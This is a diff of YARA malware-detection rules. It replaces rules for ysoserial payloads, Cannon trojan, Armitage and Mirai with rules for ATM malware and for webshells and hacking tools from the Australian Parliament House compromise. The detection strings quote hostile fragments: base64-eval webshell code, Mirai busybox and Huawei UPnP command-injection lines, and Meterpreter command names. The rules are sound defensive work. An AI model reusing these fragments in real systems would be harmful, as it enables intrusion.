+		date = "2023-10-28"
 		modified = "2023-12-05"
-		reference = "https://github.com/frohoff/ysoserial"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ysoserial_payloads.yar#L61-L90"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_unsigned_thor.yar#L4-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eec48af8bd3b377c8dd5af71027f67b36e1bd4d4ccfbd8134a26783517b5585a"
+		logic_hash = "12303e3549071dd6c8896f7a1222eb5905f6b4d3f320134416a5b6d53857adeb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a"
-		hash2 = "adf895fa95526c9ce48ec33297156dd69c3dbcdd2432000e61b2dd34ffc167c7"
-		hash3 = "1da04d838141c64711d87695a4cdb4eedfd4a206cc80922a41cfc82df8e24187"
-		hash4 = "5c44482350f1c6d68749c8dec167660ca6427999c37bfebaa54f677345cdf63c"
-		hash5 = "747ba6c6d88470e4d7c36107dfdff235f0ed492046c7ec8a8720d169f6d271f4"
-		hash6 = "f0d2f1095da0164c03a0e801bd50f2f06793fb77938e53b14b57fd690d036929"
-		hash7 = "5466d47363e11cd1852807b57d26a828728b9d5a0389214181b966bd0d8d7e56"
-		hash8 = "95f966f2e8c5d0bcdfb34e603e3c0b911fa31fc960308e41fcd4459e4e07b4d1"
-		hash9 = "1fea8b54bb92249203d68d5564a01599b42b46fc3a828fe0423616ee2a2f2d99"
-		hash10 = "0143fee12fea5118be6dcbb862d8ba639790b7505eac00a9f1028481f874baa8"
-		hash11 = "8cfa85c16d37fb2c38f277f39cafb6f0c0bd7ee62b14d53ad1dd9cb3f4b25dd8"
-		hash12 = "bf9b5f35bc1556d277853b71da24faf23cf9964d77245018a0fdf3359f3b1703"
-		hash13 = "f756c88763d48cb8d99e26b4773eb03814d0bd9bd467cc743ebb1479b2c4073e"
 
 	strings:
-		$x1 = "ysoserial/payloads/" ascii
-		$s1 = "StubTransletPayload" fullword ascii
-		$s2 = "Pwnrpw" fullword ascii
+		$s1 = "THOR APT Scanner" wide fullword
+		$s2 = "Nextron Systems GmbH" wide fullword
+		$sc1 = { 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 74 00 68 00 6F 00 72 }
 
 	condition:
-		( uint16( 0 ) == 0xedac and filesize < 40KB and $x1 ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and all of them and pe.number_of_signatures == 0
 }
-rule SIGNATURE_BASE_Ysoserial_Payload_3 : FILE
+rule SIGNATURE_BASE_ATM_Malware_Javadispcash_1 : FILE
 {
 	meta:
-		description = "Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7fb67f48-66dc-57a4-9075-49b2277fa186"
-		date = "2017-02-04"
+		description = "Detects ATM Malware JavaDispCash"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "7aa91719-6539-572a-8618-bfb5290a5b59"
+		date = "2019-03-28"
 		modified = "2023-12-05"
-		reference = "https://github.com/frohoff/ysoserial"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ysoserial_payloads.yar#L92-L113"
+		reference = "https://twitter.com/r3c0nst/status/1111254169623674882"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_atm_javadipcash.yar#L1-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "49491d1c15af8c271fbbb7dedc678a91df74dcb093abe3f056b1ffc2fced99fe"
+		logic_hash = "9a714571281844cfe7193b7c183b86b797ef5de5d1922eacaf45dad8d41cfc52"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f0d2f1095da0164c03a0e801bd50f2f06793fb77938e53b14b57fd690d036929"
-		hash2 = "5466d47363e11cd1852807b57d26a828728b9d5a0389214181b966bd0d8d7e56"
+		hash1 = "0149667c0f8cbfc216ef9d1f3154643cbbf6940e6f24a09c92a82dd7370a5027"
+		hash2 = "ef407db8c79033027858364fd7a04eeb70cf37b7c3a10069a92bae96da88dfaa"
 
 	strings:
-		$x1 = "ysoserialq" fullword ascii
-		$s1 = "targetClassInterceptorMetadatat" fullword ascii
-		$s2 = "targetInstancet" fullword ascii
-		$s3 = "targetClassL" fullword ascii
-		$s4 = "POST_ACTIVATEsr" fullword ascii
-		$s5 = "PRE_DESTROYsq" fullword ascii
+		$CashInfo = "getNumberOfCashUnits" ascii wide
+		$Dispense = "waitforbillstaken" ascii wide
+		$Inject = "No code to inject!" ascii wide
+		$config = ".Agentcli" ascii wide
+		$log1 = "logft.log" ascii wide
+		$log2 = ".loginside" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0xedac and filesize < 10KB and $x1 ) or ( all of them )
+		uint16( 0 ) == 0x4B50 and filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_APT_APT28_Cannon_Trojan_Nov18_1 : FILE
+rule SIGNATURE_BASE_APT_Webshell_Tiny_1 : FILE
 {
 	meta:
-		description = "Detects Cannon Trojan used by Sofacy"
+		description = "Detetcs a tiny webshell involved in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a60f3e75-8bfe-592e-90d1-321bd86173ac"
-		date = "2018-11-20"
+		id = "e65a8920-0684-5aae-a2b8-079c2beae08a"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_cannon.yar#L2-L32"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L12-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "de8c7bf80fe6209d00955c375b769a3aca138759335abb11f5086f85a4a9c367"
+		logic_hash = "277162f720195c94d36fd3350d0dda785007e8cc6ed2ab2aa1a6a6262f2993fa"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "61a1f3b4fb4dbd2877c91e81db4b1af8395547eab199bf920e9dd11a1127221e"
 
 	strings:
-		$xc1 = { 46 6F 72 6D 31 00 63 61 6E 6E 6F 6E 00 4D 44 61
-               74 00 41 55 54 48 }
-		$xc2 = { 13 4F 00 53 00 3A 00 20 00 20 00 7B 00 30 00 7D
-               00 0A 00 00 17 53 00 44 00 69 00 72 00 3A 00 20
-               00 20 00 7B 00 30 00 7D 00 0A 00 00 1B 44 00 6F
-               00 6D 00 61 00 69 00 6E 00 3A 00 20 00 20 00 7B
-               00 30 00 7D 00 0A 00 00 15 48 00 6F 00 73 00 74
-               00 3A 00 20 00 7B 00 30 00 7D 00 0A 00 00 21 43
-               00 75 00 72 00 72 00 65 00 6E 00 74 00 55 00 73
-               00 72 00 3A 00 20 00 7B 00 30 00 7D 00 0A 00 00
-               17 54 00 69 00 6D 00 65 00 5A 00 3A 00 20 00 7B
-               00 30 00 7D }
-		$x2 = "\\Desktop\\cannon\\obj\\" ascii
-		$x3 = "C:\\Users\\Public\\Music\\s.txt" fullword wide
-		$s1 = "C:\\Documents and Settings\\All Users\\Documents" fullword wide
-		$s2 = "notEncoded - Value here is never used" fullword wide
-		$s3 = "Windows NT\\CurrentVersion\\Winlogon\"" fullword wide
-		$s4 = "AnswerMessageTraverser`1" fullword ascii
+		$x1 = "eval(" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of ( $x* ) or 3 of them
+		( uint16( 0 ) == 0x3f3c or uint16( 0 ) == 0x253c ) and filesize < 40 and $x1
 }
-rule SIGNATURE_BASE_SUSP_RDP_File_Indicators_Oct24_1 : FILE
+rule SIGNATURE_BASE_APT_Webshell_AUS_Tiny_2 : FILE
 {
 	meta:
-		description = "Detects characteristics found in malicious RDP files used as email attachments in spear phishing campaigns"
-		author = "Florian Roth"
-		id = "16128c1e-64ed-5a3e-ad1e-e0330d91f5a9"
-		date = "2024-10-25"
-		modified = "2024-12-12"
-		reference = "https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nobellium_rdp_phish.yar#L2-L24"
+		description = "Detetcs a tiny webshell involved in the Australian Parliament House network compromise"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4746d4ce-628a-59b0-9032-7e0759d96ad3"
+		date = "2019-02-18"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L25-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "55bd63738c38719ce7aeb874956488b0d3f7167a31d880ee61994b5921bd1458"
+		logic_hash = "e26c265d2b1606257d8c843921601f14cae2beaf246f8e37daeeb6c5ff12f289"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "280fbf353fdffefc5a0af40c706377142fff718c7b87bc8b0daab10849f388d0"
-		hash2 = "8b45f5a173e8e18b0d5c544f9221d7a1759847c28e62a25210ad8265f07e96d5"
-		hash3 = "9b8cb8b01ce4eafb9204250a3c28bfaf70cc76a99ce411ad52bbf1aa2b6cce34"
-		hash4 = "ba4d58f2c5903776fe47c92a0ec3297cc7b9c8fa16b3bf5f40b46242e7092b46"
-		hash5 = "f357d26265a59e9c356be5a8ddb8d6533d1de222aae969c2ad4dc9c40863bfe8"
+		hash1 = "0d6209d86f77a0a69451b0f27b476580c14e0cda15fa6a5003aab57a93e7e5a5"
 
 	strings:
-		$s1 = "redirectclipboard:i:1" wide fullword
-		$s2 = "redirectprinters:i:1" wide fullword
-		$s3 = "remoteapplicationmode:i:1" wide fullword
-		$s4 = "username:s:" wide
-		$s5 = "emoteapplicationicon:s:C:\\Windows\\SystemApps" wide
+		$x1 = "Request.Item[System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(\"[password]\"))];" ascii
+		$x2 = "eval(arguments,System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(\"" ascii
 
 	condition:
-		filesize < 50KB and all of them
+		( uint16( 0 ) == 0x3f3c or uint16( 0 ) == 0x253c ) and filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_Armitage_Msfconsole : FILE
+rule SIGNATURE_BASE_APT_Webshell_AUS_Jscript_3 : FILE
 {
 	meta:
-		description = "Detects Armitage component"
+		description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9c610cd0-663e-54ea-a0f2-6c044fc45d23"
-		date = "2017-12-24"
-		modified = "2022-08-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_armitage.yar#L14-L29"
+		id = "ff7e780b-ccf9-53b6-b741-f04a8cbaf580"
+		date = "2019-02-18"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L40-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cf9df9858ca584288288fd0b55fdcf65aeea410f25531ee3d8cf48c30d23824a"
+		logic_hash = "e144e555dd80e15ac9072a645e629a86ca1a6b52949d236ec3daedbf06bd6718"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "662ba75c7ed5ac55a898f480ed2555d47d127a2d96424324b02724b3b2c95b6a"
+		hash1 = "7ac6f973f7fccf8c3d58d766dec4ab7eb6867a487aa71bc11d5f05da9322582d"
 
 	strings:
-		$s1 = "\\umeterpreter\\u >" ascii
-		$s3 = "^meterpreter >" fullword ascii
-		$s11 = "\\umsf\\u>" ascii
+		$s1 = "<%@ Page Language=\"Jscript\" validateRequest=\"false\"%><%try{eval(System.Text.Encoding.UTF8.GetString(Convert.FromBase64String" ascii
+		$s2 = ".Item[\"[password]\"])),\"unsafe\");}" ascii
 
 	condition:
-		filesize < 1KB and 2 of them
+		uint16( 0 ) == 0x6568 and filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Armitage_Meterpretersession_Strings : FILE
+rule SIGNATURE_BASE_APT_Webshell_AUS_4 : FILE
 {
 	meta:
-		description = "Detects Armitage component"
+		description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c49fdb73-1c95-5c63-b039-2fddb77290dc"
-		date = "2017-12-24"
+		id = "bb5b10d1-3528-5361-92fc-8440c65dcda4"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_armitage.yar#L33-L50"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L56-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3a21a42df8f15e3e81c797feb284edfe2de7d1c182547e8606f0e48dc08f6939"
+		logic_hash = "4a4f26b50631021979e4a8246a1e1c10150f4fb03eb7d77a1042e41ef57b3961"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b258b2f12f57ed05d8eafd29e9ecc126ae301ead9944a616b87c240bf1e71f9a"
-		hash2 = "144cb6b1cf52e60f16b45ddf1633132c75de393c2705773b9f67fce334a3c8b8"
+		hash1 = "83321c02339bb51735fbcd9a80c056bd3b89655f3dc41e5fef07ca46af09bb71"
 
 	strings:
-		$s1 = "session.meterpreter_read" fullword ascii
-		$s2 = "sniffer_dump" fullword ascii
-		$s3 = "keyscan_dump" fullword ascii
-		$s4 = "MeterpreterSession.java" fullword ascii
+		$s1 = "wProxy.Credentials = new System.Net.NetworkCredential(pusr, ppwd);" fullword ascii
+		$s2 = "{return System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(" ascii
+		$s3 = ".Equals('User-Agent', StringComparison.OrdinalIgnoreCase))" ascii
+		$s4 = "gen.Emit(System.Reflection.Emit.OpCodes.Ret);" fullword ascii
 
 	condition:
-		filesize < 30KB and 1 of them
+		uint16( 0 ) == 0x7566 and filesize < 10KB and 3 of them
 }
-rule SIGNATURE_BASE_Armitage_OSX : FILE
+rule SIGNATURE_BASE_APT_Script_AUS_4 : FILE
 {
 	meta:
-		description = "Detects Armitage component"
+		description = "Detetcs a script involved in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e886e866-c163-56fb-9631-c586e9f23f9e"
-		date = "2017-12-24"
+		id = "5cbf2476-5ce8-540d-b87b-e400daf49b43"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_armitage.yar#L52-L68"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L73-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "25c94b9715fdc10d0e04eea7d5b9974e60f3e248f51b80de80542b169996fc7a"
+		logic_hash = "3a81365572380964abe07a1ec16a9ea299bf16a4e624285faaa6f72c44f762d2"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2680d9900a057d553fcb28d84cdc41c3fc18fd224a88a32ee14c9c1b501a86af"
-		hash2 = "b7b506f38d0553cd2beb4111c7ef383c821f04cee5169fed2ef5d869c9fbfab3"
+		hash1 = "fdf15f388a511a63fbad223e6edb259abdd4009ec81fcc87ce84f0f2024c8057"
 
 	strings:
-		$x1 = "resources/covertvpn-injector.exe" fullword ascii
-		$s10 = "resources/browserpivot.x64.dll" fullword ascii
-		$s17 = "resources/msfrpcd_new.bat" fullword ascii
+		$x1 = "myMutex = CreateMutex(0, 1, \"teX23stNew\")" fullword ascii
+		$x2 = "mmpath = Environ(appdataPath) & \"\\\" & \"Microsoft\" & \"\\\" & \"mm.accdb\"" fullword ascii
+		$x3 = "Dim mmpath As String, newmmpath  As String, appdataPath As String" fullword ascii
+		$x4 = "'MsgBox \"myMutex Created\" Do noting" fullword ascii
+		$x5 = "appdataPath = \"app\" & \"DatA\"" fullword ascii
+		$x6 = ".DoCmd.Close , , acSaveYes" fullword ascii
 
 	condition:
-		filesize < 6000KB and 1 of them
+		filesize < 7KB and 1 of them
 }
-rule SIGNATURE_BASE_Mirai_Botnet_Malware : FILE
+rule SIGNATURE_BASE_APT_Webshell_AUS_5 : FILE
 {
 	meta:
-		description = "Detects Mirai Botnet Malware"
+		description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a678e9f7-d516-5bdb-962e-b9d39d8a64bb"
-		date = "2016-10-04"
-		modified = "2023-01-27"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L10-L50"
+		id = "59b3f6aa-2d3b-54b4-b543-57bd9d981e87"
+		date = "2019-02-18"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L92-L111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "384f8377ca05296da1177a8939f526069fbad0bb73769bd282d81ea4d876003c"
+		logic_hash = "fb0e53e5561f7f14f2ad6afcda2798d353cf4d54d12ae3354b03d62ed0c00bf3"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c"
-		hash2 = "05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c"
-		hash3 = "20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4"
-		hash4 = "2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69"
-		hash5 = "420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175"
-		hash6 = "62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6"
-		hash7 = "70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0"
-		hash8 = "89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147"
-		hash9 = "bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4"
-		hash10 = "c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f"
-		hash11 = "d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89"
-		hash12 = "f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5"
-		hash13 = "fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b"
+		hash1 = "54a17fb257db2d09d61af510753fd5aa00537638a81d0a8762a5645b4ef977e4"
 
 	strings:
-		$x1 = "POST /cdn-cgi/" ascii
-		$x2 = "/dev/misc/watchdog" fullword ascii
-		$x3 = "/dev/watchdog" ascii
-		$x5 = ".mdebug.abi32" fullword ascii
-		$s1 = "LCOGQGPTGP" fullword ascii
-		$s2 = "QUKLEKLUKVJOG" fullword ascii
-		$s3 = "CFOKLKQVPCVMP" fullword ascii
-		$s4 = "QWRGPTKQMP" fullword ascii
-		$s5 = "HWCLVGAJ" fullword ascii
-		$s6 = "NKQVGLKLE" fullword ascii
+		$a1 = "function DEC(d){return System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(d));}" fullword ascii
+		$a2 = "function ENC(d){return Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(d));}" fullword ascii
+		$s1 = "var hash=DEC(Request.Item['" ascii
+		$s2 = "Response.Write(ENC(SET_ASS_SUCCESS));" fullword ascii
+		$s3 = "hashtable[hash] = assCode;" fullword ascii
+		$s4 = "Response.Write(ss);" fullword ascii
+		$s5 = "var hashtable = Application[CachePtr];" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 200KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or 4 of ( $s* ) )
+		uint16( 0 ) == 0x7566 and filesize < 2KB and 4 of them
 }
-rule SIGNATURE_BASE_Mirai_1_May17 : FILE
+rule SIGNATURE_BASE_HKTL_Lazycat_Logeraser
 {
 	meta:
-		description = "Detects Mirai Malware"
+		description = "Detetcs a tool used in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ac85ee28-a01f-5c3d-a534-0c19a3dc92e7"
-		date = "2017-05-12"
+		id = "a3d74657-a389-5482-ab26-966e790afd50"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L62-L78"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L113-L135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6816ab3b455bbde6c4bb43bff162615d7fc24b9d5828faa190600387c38978e1"
+		logic_hash = "2b4b69dd675172b9b0c08fac674b6daa107535694b4073750501627fb48d12c2"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "172d050cf0d4e4f5407469998857b51261c80209d9fa5a2f5f037f8ca14e85d2"
-		hash2 = "9ba8def84a0bf14f682b3751b8f7a453da2cea47099734a72859028155b2d39c"
-		hash3 = "a393449a5f19109160384b13d60bb40601af2ef5f08839b5223f020f1f83e990"
+		quality = 35
+		tags = ""
+		hash1 = "1c113dce265e4d744245a7c55dadc80199ae972a9e0ecbd0c5ced57067cf755b"
+		hash2 = "510375f8142b3651df67d42c3eff8d2d880987c0e057fc75a5583f36de34bf0e"
 
 	strings:
-		$s1 = "GET /bins/mirai.x86 HTTP/1.0" fullword ascii
+		$x1 = "LazyCat.dll" ascii wide fullword
+		$x2 = ".local_privilege_escalation.rotten_potato" ascii wide
+		$x3 = "LazyCat.Extension" ascii wide
+		$x4 = " MEOWof" ascii wide
+		$x5 = "VirtualSite: {0}, Address: {1:X16}, Name: {2}, Handle: {3:X16}, LogPath: {4}" fullword wide
+		$s1 = "LazyCat" fullword ascii wide
+		$s2 = "$e3ff37f2-85d7-4b24-a385-7eeb1f5a9562"
+		$s3 = "local -> remote {0} bytes"
+		$s4 = "remote -> local {0} bytes"
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 5000KB and all of them )
+		3 of them
 }
-rule SIGNATURE_BASE_Miari_2_May17 : FILE
+rule SIGNATURE_BASE_HKTL_Powerkatz_Feb19_1
 {
 	meta:
-		description = "Detects Mirai Malware"
+		description = "Detetcs a tool used in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1c2cc98d-8ca5-5055-8f86-7f85c046ccd9"
-		date = "2017-05-12"
+		id = "294d6f6c-dbc8-5431-87a0-64abe582c4ea"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L80-L99"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L137-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "138a7d0c5508f0168f09329e97f00d0aacef17297558338cd88a9dc3ddddfee3"
+		logic_hash = "d1d39d68c5c5a3f6142a966925e2a136e937bc09abddd4080862346683886455"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "9ba8def84a0bf14f682b3751b8f7a453da2cea47099734a72859028155b2d39c"
-		hash2 = "a393449a5f19109160384b13d60bb40601af2ef5f08839b5223f020f1f83e990"
+		tags = ""
 
 	strings:
-		$s1 = "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36" fullword ascii
-		$s2 = "GET /g.php HTTP/1.1" fullword ascii
-		$s3 = "https://%[^/]/%s" fullword ascii
-		$s4 = "pass\" value=\"[^\"]*\"" fullword ascii
-		$s5 = "jbeupq84v7.2y.net" fullword ascii
+		$x1 = "Powerkatz32" ascii wide fullword
+		$x2 = "Powerkatz64" ascii wide
+		$s1 = "GetData: not found taskName" fullword ascii wide
+		$s2 = "GetRes Ex:" fullword ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 5000KB and 2 of them )
+		1 of ( $x* ) and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_MAL_ELF_LNX_Mirai_Oct10_1 : FILE
+rule SIGNATURE_BASE_HKTL_Unknown_Feb19_1
 {
 	meta:
-		description = "Detects ELF Mirai variant"
+		description = "Detetcs a tool used in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7bb28f03-03ba-581a-bc03-bd09a52787d9"
-		date = "2018-10-27"
-		modified = "2023-01-27"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L101-L122"
+		id = "bdcadc4b-8881-5dc7-b203-4e79cbc850ed"
+		date = "2019-02-18"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L154-L172"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d16ed12522b310fccab027355281a206f5087d555f0d1fef4e7746d01d085613"
+		logic_hash = "231c771ed24106a8daf352a0df1bc2db43ebd8d1108d7fa1162d03d40e738d46"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe"
+		tags = ""
 
 	strings:
-		$x1 = " -r /vi/mips.bushido; "
-		$x2 = "/bin/busybox chmod 777 * /tmp/" ascii
-		$s1 = "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1" fullword ascii
-		$s2 = "loadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>" fullword ascii
-		$s3 = "POST /cdn-cgi/" ascii
+		$x1 = "not a valid timeout format!" ascii wide fullword
+		$x2 = "host can not be empty!" ascii wide fullword
+		$x3 = "not a valid port format!" ascii wide fullword
+		$x4 = "{0} - {1} TTL={2} time={3}" ascii wide fullword
+		$x5 = "ping count is not a correct format!" ascii wide fullword
+		$s1 = "The result is too large,program store to '{0}'.Please download it manully." fullword ascii wide
+		$s2 = "C:\\Windows\\temp\\" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 200KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or all of ( $x* ) )
+		1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_MAL_ELF_LNX_Mirai_Oct10_2 : FILE
+rule SIGNATURE_BASE_Servantshell : FILE
 {
